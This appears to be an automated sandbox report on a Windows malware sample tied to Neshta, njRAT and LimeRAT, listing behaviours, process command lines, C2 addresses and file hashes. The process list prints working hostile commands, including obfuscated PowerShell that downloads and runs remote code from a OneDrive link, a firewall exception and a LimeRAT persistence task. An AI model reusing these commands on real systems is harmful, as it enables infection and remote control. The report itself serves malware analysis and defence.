Analysis Overview
SHA256
a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f
Threat Level: Known bad
The file a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f was found to be: Known bad.
Malicious Activity Summary
Neshta
njRAT/Bladabindi
Detect Neshta Payload
Modifies system executable filetype association
Neshta family
LimeRAT
Modifies Windows Firewall
Executes dropped EXE
Obfuscated with Agile.Net obfuscator
Loads dropped DLL
Checks computer location settings
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Enumerates physical storage devices
Program crash
NSIS installer
Suspicious use of WriteProcessMemory
Modifies registry class
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-05-24 03:39
Signatures
Detect Neshta Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Neshta family
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2022-05-24 03:38
Reported
2022-05-24 03:42
Platform
win10v2004-20220414-en
Max time kernel
25s
Max time network
175s
Command Line
Signatures
Detect Neshta Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe | N/A |
Neshta
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\images.exe | N/A |
Modifies Windows Firewall
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
"C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\script.js"
C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE"
C:\Users\Admin\AppData\Roaming\images.exe
C:\Users\Admin\AppData\Roaming\images.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\scripts.vbs"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\svcripts.vbs"
C:\Users\Admin\AppData\Roaming\Sound.exe
C:\Users\Admin\AppData\Roaming\Sound.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Sound.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\images.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuACIAYABEAGAAbwBgAHcAYABOAGAAbABgAG8AYABBAGAAZABgAFMAYABUAGAAUgBgAGkAYABOAGAAZwAiACgAJwBoAFQlVCVwADoAiCWIJYgliCWIJYgliCWIJWMAaAA8JTwlPCU8JXAAYQAuAG0AeQB3AGkAcgBlAC4APCU8JTwlPCVyAGcAiCWIJYgliCVmAC4AagBwAGcAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAIgliCWIJYglJwAsACcALwAnACkALgByAGUAcABsAGEAYwBlACgAJwA8JTwlPCU8JScALAAnAG8AJwApAC4AcgBlAHAAbABhAGMAZQAoACcAVCUnACwAJwB0ACcAKQApAC4AcgBlAHAAbABhAGMAZQAoACcAIQAnACwAJwBBACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACMAJwAsACcAQgAnACkALgByAGUAcABsAGEAYwBlACgAJwA/ACcALAAnAEUAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAMgAwADAAMAAgAC0AIAAkADIAMAAwADAALAAkAG4AdQBsAGwAKQANAAoA
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuACIAYABEAGAAbwBgAHcAYABOAGAAbABgAG8AYABBAGAAZABgAFMAYABUAGAAUgBgAGkAYABOAGAAZwAiACgAJwBoAFQlVCVwADoAiCWIJYgliCWIJYgliCWIJWMAaAA8JTwlPCU8JXAAYQAuAG0AeQB3AGkAcgBlAC4APCU8JTwlPCVyAGcAiCWIJYgliCVmAC4AagBwAGcAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAIgliCWIJYglJwAsACcALwAnACkALgByAGUAcABsAGEAYwBlACgAJwA8JTwlPCU8JScALAAnAG8AJwApAC4AcgBlAHAAbABhAGMAZQAoACcAVCUnACwAJwB0ACcAKQApAC4AcgBlAHAAbABhAGMAZQAoACcAIQAnACwAJwBBACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACMAJwAsACcAQgAnACkALgByAGUAcABsAGEAYwBlACgAJwA/ACcALAAnAEUAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAMgAwADAAMAAgAC0AIAAkADIAMAAwADAALAAkAG4AdQBsAGwAKQANAAoA
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command &('I'+'EX')(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://onedrive.live.com/download?cid=C8B73A1421789816&resid=C8B73A1421789816%21127&authkey=APb9b-AX6H71Tjw')
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command &('I'+'EX')(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://onedrive.live.com/download?cid=C8B73A1421789816&resid=C8B73A1421789816%21127&authkey=APb9b-AX6H71Tjw')
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2560 -ip 2560
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 1052
C:\Users\Admin\AppData\Roaming\Data.exe
C:\Users\Admin\AppData\Roaming\Data.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Data.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 1052
C:\Windows\SYSTEM32\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Data.exe" "Data.exe" ENABLE
C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\Monitor.exe'"
C:\Users\Admin\AppData\Roaming\Monitor.exe
C:\Users\Admin\AppData\Roaming\Monitor.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Monitor.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 88.221.144.179:80 | tcp | |
| NL | 88.221.144.179:80 | tcp | |
| US | 13.89.178.26:443 | tcp | |
| NL | 104.110.191.133:80 | tcp | |
| NL | 104.110.191.133:80 | tcp | |
| NL | 104.110.191.133:80 | tcp | |
| ES | 81.61.77.92:8000 | tcp | |
| US | 8.8.8.8:53 | chopa.mywire.org | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | rnqkma.bn.files.1drv.com | udp |
| US | 13.107.42.12:443 | rnqkma.bn.files.1drv.com | tcp |
| ES | 81.61.77.92:5553 | tcp | |
| ES | 81.61.77.92:8000 | tcp | |
| ES | 81.61.77.92:5553 | tcp | |
| ES | 81.61.77.92:8000 | tcp | |
| ES | 81.61.77.92:5553 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| NL | 104.81.140.70:443 | tcp | |
| ES | 81.61.77.92:8000 | tcp | |
| ES | 81.61.77.92:5553 | tcp | |
| ES | 81.61.77.92:5553 | tcp |
Files
memory/3864-130-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
| MD5 | 9bc3a910746cc9474e22bf5893b167af |
| SHA1 | 1ce4c754b9e94bd89e09dbd38071739ef276f91d |
| SHA256 | a8a0d6aa1c57d9f2e154e4e2d7910e96f7ce9ddb322b79ec551b5fa166cade00 |
| SHA512 | 236ed3faa25e5bb90d1c51ece2e4336e4a4f759a8e75a82afee7c7cc1599012142e02832144113bc7fba4a5ba2ddca8249b8e39b36ae59ed022381a9fe18216d |
C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
| MD5 | 9bc3a910746cc9474e22bf5893b167af |
| SHA1 | 1ce4c754b9e94bd89e09dbd38071739ef276f91d |
| SHA256 | a8a0d6aa1c57d9f2e154e4e2d7910e96f7ce9ddb322b79ec551b5fa166cade00 |
| SHA512 | 236ed3faa25e5bb90d1c51ece2e4336e4a4f759a8e75a82afee7c7cc1599012142e02832144113bc7fba4a5ba2ddca8249b8e39b36ae59ed022381a9fe18216d |
C:\Windows\svchost.com
| MD5 | 8e112ef2c863c54f398e849ac946b91e |
| SHA1 | 7a74905ddbef2c834895001d820cac7780b2fd0e |
| SHA256 | b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440 |
| SHA512 | d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4 |
memory/3216-140-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\LoL Checker Cracked by Aeris - Team Otimus.exe
| MD5 | c7ec2f35a541aace005fa867f73bb1af |
| SHA1 | 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad |
| SHA256 | 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358 |
| SHA512 | b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df |
C:\odt\OFFICE~1.EXE
| MD5 | e9b6fb330ab88d47e81933f4220ebc40 |
| SHA1 | 1a0946fe9492bcec0d7042173566629f5cd7f381 |
| SHA256 | 12a4dc3d9756cf71f90304f0fabd48e972f6b64cd5dc9414036d1245116b2cbe |
| SHA512 | 15c22b0cb47d34ca2511a1cf781faf6fd02afe6b48a2ef0078e6344e995347b9f2b839926fc7ea8939491aabf96a7204dfa54f08ed1560f70b3444e0dabf12ff |
memory/2560-137-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
| MD5 | c7ec2f35a541aace005fa867f73bb1af |
| SHA1 | 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad |
| SHA256 | 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358 |
| SHA512 | b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df |
C:\Windows\svchost.com
| MD5 | 8e112ef2c863c54f398e849ac946b91e |
| SHA1 | 7a74905ddbef2c834895001d820cac7780b2fd0e |
| SHA256 | b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440 |
| SHA512 | d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4 |
memory/3184-133-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\images.exe
| MD5 | 9a3a6d3562b8b2f6794acba836aefdb7 |
| SHA1 | 317ba6fe78187d043dcef3828c18f29ec75e9502 |
| SHA256 | 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac |
| SHA512 | 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc |
memory/4420-147-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\images.exe
| MD5 | 9a3a6d3562b8b2f6794acba836aefdb7 |
| SHA1 | 317ba6fe78187d043dcef3828c18f29ec75e9502 |
| SHA256 | 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac |
| SHA512 | 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc |
C:\Windows\directx.sys
| MD5 | b681422f35254a4040cc95d34543c7ef |
| SHA1 | 45522ff90230eae7c7f3d7843b954553a4b61004 |
| SHA256 | f5ba621473ff11b8461b3d8e250aa0470f760adf34de4692796b05f700a27aa4 |
| SHA512 | c60e0189f32d35da0c44191f03b25aaa05664a50a4b7ae4232727903dcd2476e353b618a5833e740ef9837ea13ec5f434ddf15da9e507cf0b734e973bbef7a94 |
memory/4068-149-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sound.exe
| MD5 | a76afee2b8f9ac817875621e55de6a0a |
| SHA1 | fef92a35b4ff174e16fd925e6903dd71ee186e7e |
| SHA256 | 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25 |
| SHA512 | e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d |
memory/3808-155-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sound.exe
| MD5 | a76afee2b8f9ac817875621e55de6a0a |
| SHA1 | fef92a35b4ff174e16fd925e6903dd71ee186e7e |
| SHA256 | 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25 |
| SHA512 | e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d |
C:\Users\Admin\AppData\Roaming\svcripts.vbs
| MD5 | c23ba5de4e95d79c987165773bd4710d |
| SHA1 | f71c5d7761888a1747e4ab0310d31500002845e6 |
| SHA256 | d2b21945cdf209e4b38fa57f5a3bb24d4d4c5e670959f00d00c8e001ce9b0c09 |
| SHA512 | e115266d9189b297d672a9f2d13ba98d913cba3c90fc630cc14e5b1095c5f61dc1ca7d29c5083b66c02d79e93eadb95d411b849c6bc693184fd63205b454fcb1 |
C:\Users\Admin\AppData\Roaming\scripts.vbs
| MD5 | 6bc888f264b6ad4e3cabda337ebdaf1b |
| SHA1 | 13f431ce35157695fae9c2ef4729ea478d17425f |
| SHA256 | 8adf34f5a2d889ce512e8620ba2828ed7932d077b36a2c3a5f89cafcd2d399bb |
| SHA512 | 44fe61c6d1ef1a1b678f555d689628d7a45be0460c93e4406a07316953da92672b7453a27cba1d16180da8d2067a0cdeb216b5eedfbf9de79afc6d6969187a37 |
C:\Users\Admin\AppData\Roaming\script.js
| MD5 | 3f0b0592cd10d2383602a037c0baf51d |
| SHA1 | 4694d2da3f6f6cb8fac2ad064650dc801271b5d7 |
| SHA256 | 1782a96b0ad9d16b692625c4219b2f96504c91578bfb1b5bc1a986da8f42a360 |
| SHA512 | 01f26f84a4a003c68b7dec6e07b48423c398248a3c5751e91233fd472b3d8a827c482ff9348d856d740768ab0fd88d7ac75ab90f8ee6686dcf8442898b2e39ea |
C:\Windows\directx.sys
| MD5 | 04edcfd1f9ce40116f427a8094c914e9 |
| SHA1 | 99d9e5390c12ff5fe4055bc6d0b3b0f80f4b08a7 |
| SHA256 | a791ef37ebd96055d88913449ed4db8084b958e22a4253afaec7d325206a7093 |
| SHA512 | 44e68208a3f253f35fba470b53a6b98d8e5324cf80cfb934bfe165f6ce9bdf6ce413f387a77959633fc0c85dcc617aac5c6f34390ac5cee0b8bded57f547f50e |
C:\Windows\svchost.com
| MD5 | 8e112ef2c863c54f398e849ac946b91e |
| SHA1 | 7a74905ddbef2c834895001d820cac7780b2fd0e |
| SHA256 | b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440 |
| SHA512 | d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4 |
memory/64-153-0x0000000000000000-mapping.dmp
memory/3960-148-0x00000000007E0000-0x000000000081A000-memory.dmp
memory/3960-145-0x0000000000000000-mapping.dmp
C:\Windows\svchost.com
| MD5 | 8e112ef2c863c54f398e849ac946b91e |
| SHA1 | 7a74905ddbef2c834895001d820cac7780b2fd0e |
| SHA256 | b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440 |
| SHA512 | d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4 |
memory/4780-141-0x0000000000000000-mapping.dmp
memory/3960-159-0x00007FFAB78F0000-0x00007FFAB83B1000-memory.dmp
memory/64-160-0x00007FFAB78F0000-0x00007FFAB83B1000-memory.dmp
C:\Windows\svchost.com
| MD5 | 8e112ef2c863c54f398e849ac946b91e |
| SHA1 | 7a74905ddbef2c834895001d820cac7780b2fd0e |
| SHA256 | b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440 |
| SHA512 | d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4 |
memory/4460-168-0x0000000000000000-mapping.dmp
memory/2560-169-0x0000000000CD0000-0x0000000000CF0000-memory.dmp
memory/4616-167-0x0000000000000000-mapping.dmp
C:\Windows\directx.sys
| MD5 | 50f22fccb8cf39d0625e0b4712d41cc5 |
| SHA1 | 97f5c502e7e3ffb5e4db64bd32d49e12b3b3dd35 |
| SHA256 | a300d69eb7c1105cf51ea4f6a36af24ee4a68aa9e1c75b7ca624cae7f3fdd40f |
| SHA512 | 1df37ea11ecfa33819431b8105d285bdd341ccdac79065896e007f2a853e82e2bdda3997c4044e015e88595c6698152e16713574fe1faad012b2f454c7182cf9 |
C:\Windows\directx.sys
| MD5 | 50f22fccb8cf39d0625e0b4712d41cc5 |
| SHA1 | 97f5c502e7e3ffb5e4db64bd32d49e12b3b3dd35 |
| SHA256 | a300d69eb7c1105cf51ea4f6a36af24ee4a68aa9e1c75b7ca624cae7f3fdd40f |
| SHA512 | 1df37ea11ecfa33819431b8105d285bdd341ccdac79065896e007f2a853e82e2bdda3997c4044e015e88595c6698152e16713574fe1faad012b2f454c7182cf9 |
memory/4584-162-0x0000000000000000-mapping.dmp
C:\Windows\svchost.com
| MD5 | 8e112ef2c863c54f398e849ac946b91e |
| SHA1 | 7a74905ddbef2c834895001d820cac7780b2fd0e |
| SHA256 | b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440 |
| SHA512 | d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4 |
memory/3544-161-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | b2731afa7807057bbbe61d21732a3206 |
| SHA1 | 7a0e822b557fda59aa5b2c0275d293032fa40c47 |
| SHA256 | 45dee80d2828fa28433d10f7f333c9e440f4682b1f3c89bdd4112b37ed32cbcc |
| SHA512 | dda36acab2dbeb72fc96c5b5bc4f9273987c998d5b8a437a829a5c85ff2fa9f3640e85c92db32820fcc85e65f468a83936734926e39cdb6bd0069febb001e853 |
memory/4616-171-0x0000000002790000-0x00000000027C6000-memory.dmp
memory/2560-172-0x0000000005640000-0x00000000056D2000-memory.dmp
memory/4616-173-0x0000000004E40000-0x0000000005468000-memory.dmp
memory/4616-174-0x0000000004C70000-0x0000000004C92000-memory.dmp
memory/4616-176-0x00000000055E0000-0x0000000005646000-memory.dmp
memory/4616-175-0x0000000005570000-0x00000000055D6000-memory.dmp
memory/4616-177-0x0000000005B90000-0x0000000005BAE000-memory.dmp
memory/4652-178-0x0000000000000000-mapping.dmp
C:\Windows\directx.sys
| MD5 | 50f22fccb8cf39d0625e0b4712d41cc5 |
| SHA1 | 97f5c502e7e3ffb5e4db64bd32d49e12b3b3dd35 |
| SHA256 | a300d69eb7c1105cf51ea4f6a36af24ee4a68aa9e1c75b7ca624cae7f3fdd40f |
| SHA512 | 1df37ea11ecfa33819431b8105d285bdd341ccdac79065896e007f2a853e82e2bdda3997c4044e015e88595c6698152e16713574fe1faad012b2f454c7182cf9 |
C:\Users\Admin\AppData\Roaming\Data.exe
| MD5 | a76afee2b8f9ac817875621e55de6a0a |
| SHA1 | fef92a35b4ff174e16fd925e6903dd71ee186e7e |
| SHA256 | 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25 |
| SHA512 | e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d |
memory/5112-183-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Data.exe
| MD5 | a76afee2b8f9ac817875621e55de6a0a |
| SHA1 | fef92a35b4ff174e16fd925e6903dd71ee186e7e |
| SHA256 | 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25 |
| SHA512 | e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d |
C:\Windows\svchost.com
| MD5 | 8e112ef2c863c54f398e849ac946b91e |
| SHA1 | 7a74905ddbef2c834895001d820cac7780b2fd0e |
| SHA256 | b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440 |
| SHA512 | d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4 |
memory/4764-179-0x0000000000000000-mapping.dmp
memory/5112-185-0x00007FFAB78F0000-0x00007FFAB83B1000-memory.dmp
memory/4616-186-0x0000000006090000-0x00000000060D4000-memory.dmp
memory/4460-188-0x0000000007170000-0x000000000718A000-memory.dmp
memory/4460-187-0x00000000077B0000-0x0000000007E2A000-memory.dmp
memory/4248-189-0x0000000000000000-mapping.dmp
memory/4460-190-0x0000000007470000-0x00000000074E6000-memory.dmp
C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe
| MD5 | d8d83f120a94686c180a07add6fd7fae |
| SHA1 | 05570c7b2b50453a84ce71a32d6988813a8268be |
| SHA256 | 620795199d3d28dbe5849f30b2c2a3d56a5b81016b846ac9eab5c3323313edd3 |
